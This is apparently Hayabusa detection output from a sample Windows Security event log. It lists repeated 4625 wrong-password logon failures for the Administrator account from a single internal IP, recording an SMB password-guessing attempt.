2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
